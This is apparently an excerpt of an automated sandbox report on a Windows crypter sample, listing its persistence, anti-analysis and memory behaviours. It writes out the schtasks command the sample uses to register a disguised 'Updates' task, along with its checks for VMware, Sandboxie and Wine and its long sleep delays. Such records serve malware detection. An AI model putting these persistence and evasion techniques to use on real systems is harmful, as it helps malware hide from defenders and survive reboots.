            Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.359410400.000000000194A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000002.361323624.0000000001AE0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.355211610.00000000017A7000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 0000000D.00000002.501948554.0000000001950000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.504620671.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.578060777.0000000003720000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.501310955.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.581625002.000000000383F000.00000040.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 0_2_02E3F401 push ecx; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 0_2_053571C1 push esp; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B5D0D1 push ecx; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_0040588C push 00000021h; retf
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_004229DB push ebx; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_004212CC push eax; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_00421319 push eax; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_00421322 push eax; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_00421383 push eax; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_00409C01 push eax; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_00422C0F push dword ptr [B99DF5C4h]; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_0041AD57 push ebp; iretd
            Source: initial sampleStatic PE information: section name: .text entropy: 7.644411619658559
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeFile created: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe

            Boot Survival

            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara matchFile source: 7.2.FqJXaFxwEj.exe.2e02e38.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.FqJXaFxwEj.exe.2e20608.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.2eb0724.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.2e92f54.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.390890604.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.359675878.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.361866159.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe PID: 3292, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: FqJXaFxwEj.exe PID: 5516, type: MEMORYSTR
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359675878.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.361866159.0000000003151000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 00000007.00000002.390890604.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359675878.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.361866159.0000000003151000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 00000007.00000002.390890604.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe TID: 4584Thread sleep time: -38122s >= -30000s
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe TID: 2144Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2264Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5192Thread sleep count: 9277 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 996Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe TID: 5560Thread sleep time: -38122s >= -30000s
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe TID: 2472Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD5BA5 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9438
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9277
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeAPI coverage: 1.2 %
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeThread delayed: delay time: 38122
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeThread delayed: delay time: 38122
            Source: explorer.exe, 0000000E.00000000.411916320.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
            Source: explorer.exe, 0000000E.00000000.454651139.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 0000000E.00000000.400286007.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
            Source: FqJXaFxwEj.exe, 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 0000000E.00000000.455182068.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: FqJXaFxwEj.exe, 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: explorer.exe, 0000000E.00000000.486557090.000000000CDEC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
            Source: explorer.exe, 0000000E.00000000.454651139.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
            Source: explorer.exe, 0000000E.00000000.415035418.00000000085A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: FqJXaFxwEj.exe, 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: FqJXaFxwEj.exe, 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B851BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BDF1B5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3C9BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B299BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B299BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B399BC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B361A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B161A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B869A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B08190 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34190 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0519E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0519E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCA189 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCA189 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B031E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B941E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD89E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2D1EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC31DC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC31DC mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC19D8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1C1C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B199C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B199C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B199C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B199C7 mov eax, dword ptr fs:[00000030h]
